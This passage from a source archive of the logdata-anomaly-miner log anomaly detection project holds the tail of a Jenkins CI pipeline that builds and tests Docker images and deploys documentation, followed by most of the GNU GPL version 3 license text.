aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=ubuntu:20.04 ." 
sh "mkdir -p /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Fedora Docker") { steps { script { fedoraimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_fed -t aecid/aminer-fedora:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development ." 
sh "mkdir -p /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-fedora:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("RedHat Docker") { steps { script { redhatimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_red -t aecid/aminer-redhat:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development ." 
sh "mkdir -p /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-redhat:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Build Documentation") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } environment { BUILDDOCSDIR = sh(script: 'mktemp -p $WORKSPACE_TMP -d | tr -d [:space:]', returnStdout: true) } steps { script { docsimage = true } sh "docker build -f Dockerfile -t aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." 
sh "chmod 777 ${env.BUILDDOCSDIR}" sh "chmod g+s ${env.BUILDDOCSDIR}" sh "docker run --rm -v ${env.BUILDDOCSDIR}:/docs/_build aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID mkdocs" sh "scripts/deploydocs.sh ${env.BRANCH_NAME} ${env.BUILDDOCSDIR}/html /var/www/aeciddocs/logdata-anomaly-miner" } } stage("Try It Out") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runTryItOut development" } } stage("Getting Started") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runGettingStarted development" } } stage("Sequence Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnSequenceDetector development" } } stage("Frequency Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnFrequencyDetector development" } } stage("MissingMatchPathDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToMissingMatchPathValueDetector development" } } stage("EntropyDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToEntropyDetector development" } } } } stage("Wiki Tests - main") { when { branch "main" } parallel { stage("Try It Out") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runTryItOut main" } } stage("Getting Started") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runGettingStarted main" } } stage("Sequence Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnSequenceDetector main" 
} } stage("Frequency Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnFrequencyDetector main" } } stage("MissingMatchPathDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToMissingMatchPathValueDetector main" } } } } } post { always { script { sh "docker rmi aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" if( debianbookwormimage == true ) { sh "docker rmi aecid/aminer-debian-bookworm:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( debianbullseyeimage == true ) { sh "docker rmi aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( debianbusterimage == true ) { sh "docker rmi aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( productionimage == true ) { sh "docker rmi aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( ubuntu22image == true ) { sh "docker rmi aecid/aminer-ubuntu-2204:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( ubuntu20image == true ) { sh "docker rmi aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( fedoraimage == true ) { sh "docker rmi aecid/aminer-fedora:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( redhatimage == true ) 
{ sh "docker rmi aecid/aminer-redhat:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( docsimage == true){ sh "docker rmi aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } } } success { setBuildStatus("Build succeeded", "SUCCESS"); } failure { setBuildStatus("Build failed", "FAILURE"); } } } logdata-anomaly-miner-2.8.0/LICENSE000066400000000000000000001045131500476301700167160ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. 
For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. 
Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. 
"Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. 
Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. 
When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. 
This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. 
b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. 
A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. 
But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. 
Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. 
If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. 
Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. 
The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. 
"Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. 
If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. 
If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. 
